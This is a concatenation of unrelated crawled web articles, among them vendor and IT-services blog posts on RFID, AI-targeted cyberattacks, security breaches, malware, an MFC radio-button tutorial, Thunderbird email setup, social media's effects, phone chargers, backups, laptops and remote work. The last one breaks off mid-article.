- Choose a system and equipment: Select a system frequency — low, high or ultrahigh — that meets the needs of your business, then select equipment that supports your business and processes. Work with your vendor to determine what types of tags, scanners, encoders and software will work best for your needs.
- Implement RFID in stages: Once your equipment arrives, test it thoroughly before deployment with the help of your vendor. Once you’ve worked out any major bugs or questions, begin with your step-by-step implementation plan.
To better understand RFID implementation and the common mistakes to avoid, download our “Five Mistakes to Avoid” article.
RFID Solutions From DataSpan
If you’re interested in implementing your own RFID system or improving an existing one, DataSpan is here to help.
Our tailored RFID solutions enable businesses to collect the data they need to make critical business decisions and leverage RFID to the fullest. We analyze existing applications and processes in a range of fields to help our customers get the most out of their RFID systems. We’ll match you with the optimal tags, hardware, software and professional services you need to develop an integrated and scalable RFID solution. From system design services and training to installation and integration, DataSpan is here to help.
Contact DataSpan today to learn more about our RFID solutions. | <urn:uuid:4e707440-dd49-469c-9a50-00e9eb731290> | CC-MAIN-2022-40 | https://dataspan.com/blog/radio-frequency-identification-rfid/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00793.warc.gz | en | 0.917677 | 1,709 | 3.203125 | 3 |
Artificial intelligence (AI) has created new possibilities for business organizations. The ability to automate and augment human intelligence has allowed organizations to:
- Transform operations
- Adopt new business models
- Understand customer behavior
- Predict cyberattacks
With these capabilities, organizations are able to adapt their operations and prepare for the challenges and opportunities—before they occur.
Unfortunately, artificial intelligence has also empowered cybercriminals. Taking advantage of sophisticated and intelligent technology solutions, they can:
- Find loopholes in corporate IT networks
- Launch large-scale Denial of Service (DoS) attacks
- Counter the limited security capabilities of an average organization.
Cyberattacks that harness AI might be the biggest threat facing organizations today—so let’s take a look at how this changes the enterprise cybersecurity landscape.
Modern cyberattacks attack data
Until recently, many cyberattacks were intended to compromise networks and access sensitive information. These stats are beginning to tell a newer, bigger story:
- In the first six months of 2020, 36 billion data records were compromised.
- Only 5% of an organization’s files are protected, on average.
- The average data breach costs $3.86 million in damages. That cost is bound to increase thanks to prevailing stringent regulations, like GDPR, that impose financial penalties on organizations failing to adopt the necessary security measures.
- It takes 200 days+ on average to first identify a security breach and up to 280 days to contain the damages.
Now consider the size of our digital universe, the big data that represents the opportunity for business organizations to leverage AI solutions in making well-informed decisions. We have already produced 44 zettabytes (44×1021) of data. By the year 2025, we expect to have generated 175 zettabytes of information.
So, what does this big data mean for attackers? The threat surface just got exponentially bigger. Consider these AI adoption trends:
- 58% of the respondents believe they have used AI in at least one of the business functions (McKinsey).
- The number of organizations adopting AI technologies has increased by more than 270% since 2015 (Gartner, 2019).
- More than 50% of the organizations reported improvement in productivity due to AI technology investments (PWC, 2018).
- The global AI market is expected to reach $327.5 billion by 2021, at a year on year growth of 16.4% (IDC).
These trends have given rise to a new form of cyberattack threat vertical: AI cyberattacks.
What are AI cyberattacks?
AI Cyberattacks is the term for any offensive maneuvers launched on:
- AI systems
- The data processing pipeline
Since most AI practitioners excel at making sense of the available information, they are rarely the security experts who can protect their systems and data. Cybercriminals have found ways to compromise these systems, which has led to the concept of adversarial AI. This type of cyberattack jeopardizes the potential of data and AI systems to deliver the promised value to the business.
Common types of AI cyberattack
According to Gartner:
Through 2022, 30% of all AI cyberattacks will leverage training-data poisoning, AI model theft or adversarial samples to attack AI-powered systems.
In an effort to understand and mitigate potential threats, let’s look at these three AI-focused attack models.
AI model theft
AI model theft is the reverse engineering or hijacking of AI models. Once a model is trained and embedded on a vulnerable hardware chip or a cloud network, cybercriminals can:
- Access the AI systems
- Reverse engineer the machine learning (ML)/AI models
Confidential AI models are also being deployed on public networks accessible through API queries. Algorithms can also be reconstructed based on the data being ingested and delivered as an output from deployed models.
Adversarial samples are small sample instances that introduce feature perturbations, causing AI models to learn from the manipulated data and therefore learn to classify incorrectly. The samples are counterfactual, and the ML models fail to interpret them. As a result, the model becomes a source of incorrect classification decisions.
For example, consider a self-driving Tesla that is designed to slow down ahead of a stop sign. If the stop sign is manipulated or painted in another color, the car may fail to recognize the sign.
Training-data poisoning is the manipulation of training data that AI practitioners use to train the model.
Once cybercriminals gain unauthorized access to the storage network, they can alter the data or introduce significantly different data sets that are fed to the learning model, together with the original data.
Unlike the classical adversarial AI cyberattack that relies on stealing a pre-trained model, machine learning data poisoning targets only the training information fed to the model. Fewer highly skewed samples of input data are needed to manipulate the learning of the model itself—a benefit for the cybercriminals. Once an ML model is trained on the poisoned data, especially in the case of unsupervised learning models, you’ll likely require deep AI expertise in order to identify possible issues with training data.
For instance, the accuracy and loss minimization of your model can change readily when a compromised model is tested against the uncorrupted datasets.
Planning for AI cyberattacks
Being aware of AI cyberattacks is the first step in preventing them. Security best practices encourage categorizing every potential threat into one function of the CIA triad, the most essential IT security concept. The MITRE ATT&CK Framework is a free resource that can also help inform your risk management practices. | <urn:uuid:b646848a-e26b-4f9b-92a2-448d82c61760> | CC-MAIN-2022-40 | https://www.bmc.com/blogs/artificial-intelligence-cyberattacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00793.warc.gz | en | 0.921937 | 1,169 | 2.546875 | 3 |
As of today, security is a hot topic for not just IT industry but almost everyone. From personal mail accounts to data encryption, everyone has something valuable to protect. When we ‘protect’ something, we build a physical and/or virtual system that hinders any unauthorized viewers and users. And when that system fails to stop an intruder, a security compromise happens.In more technical terms, a security compromise (breach, violation) is an incident that results in unauthorized access of data, applications, services, networks and/or devices often through bypassing their security mechanisms.
With security compromise, confidential data is exposed to unauthorized people which is likely to have adverse effect on the organization’s reputation, legal standing and of course, revenue. In other words, it is essential for an organization to avoid security compromises. But how? Well, first you need to take a closer look at the different types of security compromise.
These terms are often used interchangeably but it is beneficial to bear in mind that they are in fact two different things. The nuance is in the order most of the time. Security breach happens first when an unauthorized user gains access to the system. Then happens data breach when that user views, alters or copies the data. Yet there is one exception: A company may accidentally expose data which is considered a data breach as well.
Cybercriminals often use malicious software to gain access to protected networks. Viruses, spyware and other types of malware usually find their way into your system through e-mails or downloads. In order to avoid harm by such attacks, you need strong anti-virus software or firewall. Additionally, educating your employees on not opening strange e-mails or not downloading content from untrusted sources will go a long way.
No executive likes to think that a member of their team would expose sensitive information yet up to %28 of enterprise data security incidents come from inside according to PWC’s 2014 survey. Thus insider malice must be considered along with other things. But how can we prevent it? Firstly, we must remember the fact that most malicious insider attacks happen 30 days before and following an employee’s last day.
That is why you must be strict and punctual when it comes to remove an ex or soon to be ex employer’s access to your company’s e-mail servers, VPN and other resources. Moreover, be alert to red flags that are sent by your employees. To prevent unintentional breaches from inside, you can block access to USB ports. This can prevent intentional theft and unintentional leaks. And finally, as a principle, never ever give an employee more access rights than they need to do their job properly.
Passwords are the oldest and most used authentication protocols. Yet it takes somewhere around ten minutes to crack a six-character password that’s all lowercase letters. If you capitalize some of them, it will take 10 hours. If you sprinkle some symbols and numbers, you will create a monster that will withstand at least 18 days. Long story short, change all passwords regularly and make them as complex as possible.
A social engineer works their way into an organization by taking advantage of the natural desire to help others. For instance, they convince an employee that they lost access to their account. This can manifest itself as a call to help desk or a mail to customer services. An employee can fall prey to this attack and give out information that can be used to access the company’s sensitive information. To avoid this ‘phishing’ scheme, take some common-sense precautions that require the caller or phisher to prove their identity. Adding such steps to the protocol is a very easy thing to do yet it prevents some serious breaches.
Every day hackers come up with new ways to break in, so you need to stay informed and updated. Always update your software with latest versions. Keep your staff and if necessary, customers informed. Monitor online accounts. Look for a service that can help you keep track of information.
CIA stands for Confidentiality, Integrity, and Availability, also known as CIA triad. It provides various security controls to ensure data...
The integrity of a file can be checked through a Cryptographic Hash Function or Digital Signature. | <urn:uuid:fb098861-193f-4a4f-b8dc-deb9ad70ddd2> | CC-MAIN-2022-40 | https://www.logsign.com/blog/what-is-a-security-compromise/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00793.warc.gz | en | 0.938926 | 898 | 2.578125 | 3 |
Radio Buttons in MFC (Visual Studio 2008 / C++)
This is a quick and dirty description of how to use radio buttons in MFC, written because I could not find this information in a single place on the web.
In the dialog editor:
- Create a new group with the group box control and set a meaningful caption
- Add radio button controls inside the group
- The radio buttons must have ascending tab order
- The first radio button (in tab order) must have the property “Group” set to True
- All other radio buttons must have the property “Group” set to False
It should look similar to this:
In the header file defining the dialog class:
- Add a member variable of type int that will store which radio button is selected (none: -1, first: 0, second: 1, and so on).
In the cpp file implementing the dialog class:
- In the constructor initialize the member variable (with 0)
CDialogConfig::CDialogConfig(CMainFrame* pMainFrame) : CDialog(CDialogConfig::IDD, pMainFrame), m_nLEDType(0)
- In DoDataExchange add a call to DDX_Radio similar to the following (where IDC_RADIO_LEDTYPE1 is the ID of the first radio button):
DDX_Radio(pDX, IDC_RADIO_LEDTYPE1, m_nLEDType);
When you want to read which radio button is selected:
- Call UpdateData with a parameter of true (indicates reading):
- After UpdateData has been called, the member variable (m_nLEDType in this example) has the current state of the buttons.
When you want to select one of the buttons programmatically:
- Set the member variable to the correct value (none selected: -1, first button selected: 0, second button selected: 1, and so on)
- Call UpdateData with a parameter of false (indicates writing): | <urn:uuid:a84bfb1f-9150-4271-8501-f068171d7705> | CC-MAIN-2022-40 | https://helgeklein.com/blog/radio-buttons-in-mfc-visual-studio-2008-c/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00793.warc.gz | en | 0.8047 | 462 | 2.78125 | 3 |
Thunderbird is an open source email client made by Mozilla (who also make the Firefox browser). It is available for Windows, OS X and Linux. This article explains how to configure an email account in Thunderbird and how you can archive email locally.
When you first launch Thunderbird you will be greeted by a set-up wizard, which will guide you through setting up an email account. You can also configure an email account via the Accounts menu. We will show you both ways by setting up two email accounts.
For the wizard set-up we will use the email address email@example.com, which lives on our Strawberry server. On the first screen you need to enter three bits of information:
Image: Thunderbird’s account set-up wizard.
You almost certainly want to keep the Remember password checkbox ticked (unless you like the idea of entering your email password every time Thunderbirds connects to the mail server).
After you click on Continue Thunderbird will try to find the configuration settings for the domain. Unfortunately, it will come up with the wrong results. You therefore need to manually enter the settings, which you can by clicking on the Manual config button.
Image: Thunderbird’s incorrect guess at what the email settings should be.
After clicking the Manual config button you can manually enter the incoming and outgoing server names and the username.
For the incoming server we recommend using IMAP but you can use POP3 if you prefer. The server hostname should be the hostname of the server, which in our case is strawberry.active-ns.com. If you are not sure what hostname you should use, you can find this information via the Connect Devices option in cPanel.
If you are using IMAP then the port number should be 993. Use port 995 instead if you want to use POP3. In both cases Thunderbird will automatically set the type of security used to SSL/TLS. You can leave the authentication setting set to Autodetect.
The outgoing (SMTP) server should also use the server’s hostname, and the port number should be 465. Again, the type of encryption is SSL/TLS and the authentication method can be set to Autodetect.
On the last line you need to enter the username you use to connect to the mail server. By default, Thunderbird will use the username without the domain part (i.e. it will suggest using info rather than firstname.lastname@example.org). You need to make sure that the username is your full email address.
Image: entering the incoming and outgoing server settings and the username.
When you have entered the settings you can click the Re-test button. Thunderbird will check if the settings work, and if so you can next hit the Done button.
And that should be it! You should now see your email account.
You can add a second email account by clicking on the hamburger menu in the top-right corner and selecting Preferences > Account Settings. At the bottom of the left-hand pane you can click on Account Actions and then select Add Mail Account.
Image: adding a new email account via Thunderbird’s Account Settings.
You should now see the account set-up wizard again. After adding the second email account both accounts will show in your Thunderbird.
In the below screenshot you can see the two email accounts we configured. We have selected the inbox for email@example.com, and below that you can see the firstname.lastname@example.org mailbox (which is collapsed).
Image: two email accounts in Thunderbird.
There is a third folder in the left-hand pane as well: Local Folders. This is a special folder used for archiving emails. Any emails stored under Local Folders are no longer on the server, but they are still available locally, via Thunderbird. You can view emails in the folder as per usual, but the emails are only accessible in Thunderbird (and not on, say, a mail app on a smartphone).
Thunderbird’s default way of archiving emails is a little odd. By default Thunderbird stores emails you archive in a folder named Archives. That folder lives in your inbox, which defeats the purpose of archiving emails if you want to reduce the amount space used by your email account, as the emails will still be stored on the server.
You can correct the default settings as follows:
When you now archive an email it will be stored in an Archives folder under Local Folders.
Image: the Archives folder now lives under Local Folders.
Thunderbird’s archive folders organise email by year. For instance, as you can see in the above screenshot, the single email we archived is stored in a subfolder named 2019. Many people prefer a more custom way of organising archived emails. Doing so is fairly straight forward: you create custom folders under Local Folders.
In the below screenshot I have created a folder for the info@ and nospam@ mailboxes under Local Folders. Each folder has a number of subfolders. For instance, the Info folder has two subfolders: Chess and Work. You can create custom folders by simply right-clicking on Local Folders and selecting New Folder.
Image: custom folders under Local Folders.
The advantage of this approach is that you can archive emails to specific folders. All work-related emails can go to the Work folder, while chess-related emails are kept in the Chess folder. There is a downside to this approach though: you will need to manually archive your emails. Luckily, that is straight forward enough:
Alternatively, you can do the following:
Thunderbird is a full-featured email client, and it is beyond the scope of this knowledgebase article to fully document the application. A good starting point for learning more about Thunderbird are the project’s support pages. | <urn:uuid:2ebc2fcf-e070-4074-8594-e1a3e67cad97> | CC-MAIN-2022-40 | https://www.catalyst2.com/knowledgebase/email/setting-up-an-email-account-in-thunderbird/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00193.warc.gz | en | 0.88252 | 1,222 | 2.671875 | 3 |
Is social media evolving into an antisocial medium? Days after one of its former execs argued that the answer is yes, Facebook published a post addressing the issue.
“I think we have created tools that are ripping apart the social fabric of how society works,” Chamath Palihapitiya, who once served as vice president for growth at Facebook, told an audience at the Stanford Graduate School of Business last week.
“The short-term, dopamine-driven feedback loops we’ve created are destroying how society works,” he maintained.
There is a lack of civil discourse and cooperation on social media, as well as widespread distribution of misinformation and mistruth, according to Palihapitiya.
“It’s not an American problem,” he said. “This is not about Russians ads. This is a global problem.”
Good and Bad Social Media
Some people feel bad after using social media, but others do not, wrote Facebook Director of Research David Ginsberg and Research Scientist Moira Burke.
“According to the research, it really comes down to how you use the technology,” they said.
“For example, on social media, you can passively scroll through posts, much like watching TV, or actively interact with friends — messaging and commenting on each other’s posts,” Ginsberg and Burke pointed out.
“Just like in person, interacting with people you care about can be beneficial, while simply watching others from the sidelines may make you feel worse,” they explained.
Wellness Through Better New Feeds
To help foster interaction, Facebook has made a number of changes to its services, Ginsberg and Burke noted.
For example, it has started demoting clickbait headlines and false news, and prioritizing posts from people users care about to foster more meaningful interactions and reduce passive consumption of low-quality content.
It also added a “snooze” feature allowing users to hide posts from a person, group or page for 30 days.
Take a Break is another tool designed to remove stressful content. It gives users more control over when they see an ex-partner, what their ex can view, and who can look at past posts about the relationship.
In addition, the company has launched several suicide prevention initiatives, the Facebook researchers wrote.
Facebook has invested US$1 million toward research to better understand the relationship between media technologies, youth development and well-being, they added.
Facebook’s acknowledgment that there’s more to social media than fun and sharing, and its moves to address the darker aspects of its community may not be entirely altruistic, suggested John Carroll, a mass communications professor at Boston University.
Still, “it’s a sign their awareness of bad PR has started to rise,” he told TechNewsWorld, .
“Many people think these steps are largely cosmetic. I don’t see a lot of newfound enlightenment in Mark Zuckerberg these days,” Carroll added. “He’s in a position of influence and importance in the world that he doesn’t want to face up to.”
Two Sides to Interaction
Social media can both foster and inhibit interaction, asserted Karen North, a professor of digital social media at the University of Southern California.
“It can extend out social interactions to times and places when we wouldn’t otherwise be able to interact with each other,” she told TechNewsWorld.
“Usually to interact with people, you need to be in proximity to each other,” North explained. “Social media allows us to be together even when we are physically apart.”
However, social media interaction differs from proximity interaction because it’s done through a device and involves content creation.
“That can interfere with people interacting more personally,” North said.
Avoiding Social Media Blues
There are a number of ways for individuals to avoid the potential negative consequences of social media, said Brian Primack, director of the University of Pittsburgh Center for Research on Media, Technology and Health.
There is a connection between increased depressive symptoms and the increased proportion of social media friends you don’t know in real life to those you do know, he noted.
“We also found that your mental health is better if you report that a higher proportion of your friends is what you would consider ‘close’ friends,” Primack told TechNewsWorld.
Limiting the number of social platforms you participate in can be beneficial, as the number of platforms a person uses can be a predictor of poor mental health, he observed.
Establish strict guidelines for when and where you use social media, may be helpful, Primack ventured.
“Many families are declaring evening time to be device free,” he noted. “They have everyone in the family drop their devices in a box at the front door, so that everyone can really focus on each other during a family dinner and other evening activities.” | <urn:uuid:f50e2b19-9fe4-4e30-9077-0cab9628d6bc> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/social-media-or-social-disease-85019.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00193.warc.gz | en | 0.94139 | 1,061 | 2.609375 | 3 |
Malicious Software, commonly known as Malware is software that negatively impacts your PC. Malware has been around as long as computers have, while the majority of programs you download or install on your PC are safe, some softwares were created to cause harm to you and your PC. One may ask how can a program cause me harm? Well the malware of itself cannot physically harm you but the design can cause you a lot more harm than just physical.
For instance, there is malware that was designed to steal your information, destroy your files or even worst extract payment from your bank account. Whatever the intent of the Malware’s creator that’s what the effect will be on your or your PC. Persons place malware on people’s PC for many reasons, some do it for fame, others to act as a ransom, and others just to simply cause damage to their target. Much like someone who does vandalism or arson.
Malware comes in many forms, like viruses, spyware, rootkits, ransomware, etc. It is common practice to use viruses and malware interchangeably but a virus is a type of malware. In this article, we will be talking about, how does your PC get malware, what happens when your PC is infected with malicious software, ways not to get it, and how to eliminate it.
Unfortunately, Malware is often identified when your PC has already gotten infected. Most times with malicious software, a good question to ask is “What has changed on your PC”. Is there a software you have downloaded or a particular site you have been to that asked you to accept a pop-up?
One might say that they haven’t been on any strange website, and most of the websites that they’ve been to is safe. Whereas that might be the case on the face of it. There are many websites that you click on, maybe just to check out some quick information from Google. But that site you go to just for a few seconds might have malware embedded in it. Your computer might not change in any way but the malware is being installed and running all in the background.
Another one that scammers love to use is a fake warning that comes up on your screen saying ”WARNING - Your Computer is Infected With a Virus, click here, install our software to help you clean it.” What you’re doing at this point is installing the malware on your PC. The scammers are tricking you to install malware, that type of manipulation is called social engineering. Where criminals exploit your natural inclination to trust.
Yet another way one PC can get infected with malware is by opening a file that is infected. It could occur by placing that malware on a USB drive and by using this USB drive you get malware on your PC. This could also be transferred through Emails email is the number one way of getting infected by malicious software. You open up a file sent to you via email and by just accessing that file your PC gets infected by malware. This situation is even more tricky because what if your job requires you to open up files sent to you by strangers? Like an HR department. Where individuals send you their resumes daily. Your responsibility would be to open these files to read their information. All these are ways that one can get infected by malicious software.
There are several effects that your PC will experience when you are infected. Some malware is so minor and so barely noticeable that you could be infected for years and not even realize it’s there. There are some variants of malware that are an extra advertisement that shows up at the bottom of your computer screen. You simply close the advert and it stops that program until a later time. That type of malware may not be intrusive but it is consuming ram on your PC it may pop up an advertisement that does not work appropriately or might simply just be bothersome to be closing that advert every once and a while.
Other Malware can delete your documents. For instance, you might have photos you have stored on your PC and then malware get’s installed and deletes all your photos. So you are going on your PC where you normally store photos and when you check there are no photos in that file. So much so that when you do upload photos, after a day or two they simply disappear. That is the sign of malicious software on your PC.
Some malware will start doing what is called ”thrashing the hard drive”. This is done by the program reading your hard drive as hard and fast as it can over and over and over again, reading the same sector over and over again trying to cause a failure on your hard drive. This attack can cause your hard drive to fail or your CPU to burn up. These are the software that was designed to burn up components on your computer, a very aggressive malware.
There is yet another type of malware called “Keyloggers” these are the silent type of malware. They run in the background and record every keystroke, record every key you press on the keyboard, and sends it to a server. Whoever has access to that info can now see when you log in to a particular site and sues that record username and password to enter into your various accounts. Malware can make it seem like you are seeing a fake web page instead of the real one manipulate you to put some information there.
One of the main things that happen when your PC is infected with malware is that your Pc becomes a transmitter. So if you are on a corporate network and that network host 500 PC, it only takes one PC to get corrupted and then every PC on that network can potentially get corrupted because of that one PC.
A popular type of malware these days is called ransomware. When this type of malware affects your PC it takes the form of a ransom. So the program does not delete your files, instead, it encrypts all your data. Now once encrypted you can no longer get access to your data, your data is still there however but to decrypt your data the attacker says to pay them a certain amount to decrypt your files. The reason why this type of Malware is so popular is that attackers can now monetize their malware. All of the other malware and its effects on your PC doesn’t necessarily bring a direct monetary value to them but this one does.
To eliminate malware revolve around utilizing software with the capability to identify, quarantine, and delete malware. Most times it revolves around an antivirus tool.
Antivirus Software - There are a lot of antivirus softwares out there that do an amazing job in eliminating malware on your PC. According to USNEWS, the best Antivirus software for 2021:
Antivirus software protects against these types of threats by performing key tasks like:
A good antivirus is truly your go-to tool for eliminating malware.
In conclusion, malware has been there for a long time and will continue to be present as long as computers exist. So let’s do all we can to be mindful of what malware is, how we get infected by them, and how to eliminate them.
During the Pandemic, many professionals had to switch from working at their offices to working at home. In many cases, their office computers would have all the necessary tools, softwares, and features to perform their day-to-day task. If you are working from home with large files or proprietary files like CAD, graphics design, etc. then getting that same level of efficiency from home computers may appear difficult.
Moreover, if you’re a part of a team that needs access to one particular file at the office, then working from home may make It seem impossible to collaborate with team members on this file.
Nevertheless, rest assured, accessing your large work files from home is very achievable. Whether you are downloading a lot of data at once or working on your work pc from home, there are plenty of ways to ensure you have access to your files from anywhere.
In this article, we will discuss 3 ways to access your work files remotely.
Remote Desktop Protocol (RDP) is a Microsoft operating system feature that allows a user to connect to another computer over a network connection. This feature allows you to access a separate device from the one you are using, being able to make use of it as you were there in person.
The computer that you are remoting into becomes a window on your pc screen allowing you to access all of the programs and files stored on that computer. You can be at home or anywhere with internet connectivity and be able to access the computer you have been connected to.
To access the RDP you must use Microsoft operating system. The official software is the Remote Desktop Connection, which comes preinstalled on all Microsoft systems.
The Remote Desktop Protocol is a safe and free method to access your large files from your home environment.
Remote access software allows one pc to control or view another pc from anywhere with internet connectivity. Much like Microsoft Remote Desktop software, these applications allow you to access other PCs as if you were behind the screen physically. However, unlike Microsoft, these applications can work on either Windows or macOS so one can easily access files between any machines. The remote access softwares generally provide these basic features.
Setting up remote access software generally takes a few minutes with each software offering a specific feature that makes it stand out from the other. Here are a few remote access apps and what they offer. You can get a comprehensive list of the best remote desktop softwares on G2’s website.
These apps as well as many others are available for the accessing of files remotely. Offering cloud solutions and protected access.
Desktop Virtualization allows a user to simulate workstation load from a connected device remotely or locally. Simply one of the best methods on our list, virtualization a technology that separates the infrastructure of one device from the physical client device used to access it. There are two main types of desktop virtualization, which depend on if the operating system instance is local or remote.
Remote desktop virtualizations allow an IT department to have better control over softwares and desktops using virtual machines. There are several benefits of Remote Desktop Virtualization.
Desktop virtualization is getting increasingly simple, with businesses reaping tremendous benefits from their uses. Workplaces are becoming more productive and as the work environment is constantly changing you need a robust infrastructure that is able to change/adapt to this environment. At ACT360 we offer virtualization services for when performance, ease of use, and ability to work quickly is the main goal. We work with you and bring you the best virtualization service possible.
Accessing large files remotely is becoming increasingly necessary as businesses move into a work-from-home environment. Employees need to be able to access their data anytime, anywhere, and from almost any device. We discussed three ways to access those large files remotely.
Remote Desktop Protocol, which uses Microsoft remote desktop protocol to get access to other windows desktops.
Remote Access Softwares, which are applications that offer features like remotely accessing other PCs that have the server installed, share clipboard, offering to simply view the other machine or have full control of that machine.
Desktop Virtualization, which makes it possible to access an entirely different computer with optimal protection, enhanced features, and performance.
We all forget stuff. I forgot how old my Mom was a few days ago, so I just put “Happy 35th birthday” in a card and called it quits.
Everyone laughed, and now I’m out of the will.
Maybe you’re forgetful, too. Are you reading this with only 9% battery because you forgot to charge your device last night? Are you hoping one of your co-workers has a cable you can borrow?
Let’s say you have a Samsung A10. Adam over there has a cable he picked up at the gas station for $2 that he’s using to charge is iPhone 7. Marcus has the original cable that came with his Huawei Mate 30 Pro.
So who's it going to be? Which phone charger should you borrow?
First, let’s explore what’s actually inside a phone charger cable.
A lot of engineering goes into cables – they’re not just strings of metal wrapped in rubber with an end that fits in your phone.
Inside the little plastic “heads” of OEM cables are small circuit boards and resistors. These not only protect your data, but also protect your device from surges. They’re there to make sure the cable is operating at peak efficiency.
Adam’s gas station cable is so cheap because it likely doesn’t have any of those circuit boards, whereas Marcus’ cable does.
Since neither cable is designed specifically for your Samsung A10, why does any of this matter?
On Google’s Pixel, Pixel XL, Nexus 6P and 5X devices, released in 2016/17, the cables were built with a 56k ohm resistor. Without it, unregulated electrical current coming from an uncertified third-party charger, or from the USB ports on a Mac or Windows machine, could spike. This would cause the battery to begin rapidly combusting!
Yes, older devices paired with cheap charging cables could begin smoking and melting. They could even spark a small fire!
Worst of all, because you were using an uncertified charger, you voided your warranty, leaving you on the hook to cover the loss.
With most Android and Apple devices, charging is a little less dangerous.
Apple devices can detect non-certified cables and refuse to charge or sync data.
With Android devices, all cables will accept a charge, and most will allow data to sync. However, Android limits the charge to the lowest possible setting -- typically 5W.
This is known as “trickle charging.” It works, but it’s slow.
So what about wireless chargers? Since there’s no cable plugging into your phone, it shouldn’t make a difference which charger your use, right?
Technically, that’s true, there’s no cable plugging into your phone. But there is a cable connecting the charger to a USB port, or into a wall adapter.
Old wireless chargers topped out at 5W, but today they’re up to as much as 15W. Still, the speed at which your device charges may be limited to the lowest electrical current available.
For example, if you use a 5W adapter with a 15W charging pad, you may only get the 5W charge.
Similarly, if you use a 10W charging pad with a Samsung Galaxy S20, which is capable of charging at up to 15W, your phone may still charge at the 10W electrical current.
How do you know if what you’re buying and using is a high-quality, certified phone charger?
Apple clearly prints “Made For iPhone” or “MFi” on the outside of the cable. All USB-C cables, designed for newer Android devices, read “Compliant C cable – 56k” or something similar.
All Micro and Mini USB cables for older Android devices won’t have identifiable characteristics. But they don’t require a strong electrical current to charge, so most any will be fine.
None. It’s a myth. There’s no such thing as over charging a battery. Once it’s charged, it’s charged.
Damaged chargers and cheap, counterfeit chargers might kill your battery. But generally speaking, mixing and matching cables won’t harm your battery. At least not when it comes to new phones.
You may just be reduced to the trickle charge we mentioned earlier.
Phones like Huawei and OnePlus use proprietary circuitry to deliver a fast charge. That means you have to use the charger that comes with your phone if you want to take full advantage of their quick-charge capabilities.
Note: OnePlus Nord is set to release July 21, 2020, and is available for pre-order.
If you’re not sure which chargers are safe for your device, or if you have any other questions about your mobile device, batteries or chargers, give us a call at 705-739-2281. We can help.
When you don’t preserve your network, you set yourself up for critical issues, not the least of which include data loss and downtime.
Here are 3 things you can do right now to protect your network from a catastrophic event.
According to research conducted in March 2020 by HelpNetSecurity.com, 21% of SMBs do not have a data protection plan, leaving them vulnerable to cyber attacks and data loss.
While 57% of the top leaders in accounting, banking and finance said data backup is the key concern in data protection, daily backups are often overlooked. Ontech Systems states, “60% of backups are incomplete and 50% of restores fail.”
Between malware, cyber criminals and natural disasters, it’s not a matter of if SMBs will have a problem, but when.
Data protection is not a set it and forget it task. It requires frequent checks and ongoing maintenance to ensure everything is running as it was set up to run.
For example, you may think your daily backups are working just fine because you see the files every day. But if you’re not checking them, how will you know if those files have become corrupt? How will you know if large chunks of data are being missed?
The only way to be sure your backup procedure is working properly is to check on it frequently.
It may seem like a hassle to continually update your anti-virus and firewall software but failing to do so can leave you exposed to harmful cyber attacks. According to Ontech, roughly 20% of SMBs will be hacked within 1 year, and more than 50% won’t even know they’ve been attacked.
Protect your data with reputable anti-virus and firewall software. And don’t forget to update security patches! New viruses are being created all the time, which means last month’s anti-virus may be obsolete this month without the new patch.
Of course there are many more ways to protect important data. When you're ready to explore your data protection options, give us a buzz, our IT experts will help you setup and implement the right data protection plan for your business.
Whether it be you’re replacing a dying/old laptop, or you’re buying your first laptop, that the key to look for is the specs, and nothing else. While yes, specs do mean longevity, performance and others, if you came across two laptops with the same specs, but one was $250 cheaper, you’d obviously buy that one.
Why spend that extra $250? Here’s why:
As with any laptop, specs are king – or at least, that’s what the marketing will let you believe. The age-old idiom of “You get what you pay for” is king in the computer world, whether that be laptops or desktops.
If you spend $3500 on a Mac desktop, you’re getting mid to top end hardware in a shiny fancy metallic enclosure. You’re getting stability and recovery options that Windows based machines can’t even come close too, but you’re also getting limited and expensive repair costs, and technical support is either hard to come by or expensive as well.
Almost any consumer grade based laptop or desktop is made of plastic. Any time plastic is heated and cooled repeatedly (aka. When you turn your laptop on and off), that plastic weakens the structural integrity. One day you’ll wake up and go to your laptop, open the lid and *CRACK*, the hinge your lid opens on splits in half, and you’re now not able to open the screen.
You can either plug it into another monitor if your laptop supports it, or you’ll have to get that hinge fixed. In our experience, replacing the bottom plastic shell and hinge assemblies on LCDs are so expensive, that it’s more profitable for you as a consumer to buy another laptop. You’ll then have to go through the hassle of transferring your data, re-acquiring your software, disposing of the broken laptop, and more.
Plastic structural integrity could fail in as few as 50 heat/cool cycles, or as much as 1000. You could get lucky, or you could get a lemon that isn’t covered under any warranty. Now you’re out $200, and a new headache is forming.
Business grade laptops, available at most high-end computer shops, are usually made of metal, or from a robust polymer that doesn’t weaken when heated and cooled repeatedly.
These laptops, while more expensive usually, come with the same or exceed the specs of a consumer grade laptop, and are manufactured and engineered to last a company 5+ years.
For a small investment, you wouldn’t need to be replacing everything every other year. You’ll get the same or better warranty, and components inside (what makes up the specs) are usually a higher quality part, or a name brand component, not a “as cheap as we can find to drive the price down” consumer grade part.
A handy breakdown of what specs you should be asking about, or looking for, will be coming within a few weeks, so stay tuned.
As always, if you have any questions regarding the differences between business and consumer grade computers, please don’t hesitate to contact us!
Ah yes, having the option to work from home. A fantastic perk for the average office employee.
What used to be a one-off just a few months ago is now a government-mandated regulation. At least for the time being. We thought it would be a short-term scenario, but this new way of conducting business may be proving more desirable to many SMBs.
Let’s face it, there’s less overhead, fewer hours spent commuting, and many employees are finding a positive work/life balance. We’re proving that we are truly capable of being productive in our job even though we’re working from home.
For the business owners who decide to give remote working an indefinite kick at the can, transitioning from a traditional work setting will, of course, require some adjustments. Not only by business owners, but by employees as well.
Last year, for example, staff would come together in an office setting, complete with computers, water coolers and a “9 to 5” schedule. The day was quite structured. As an employer, it was easy to keep tabs on everything and everyone. As an employee, it was easy to access information and collaborate with colleagues.
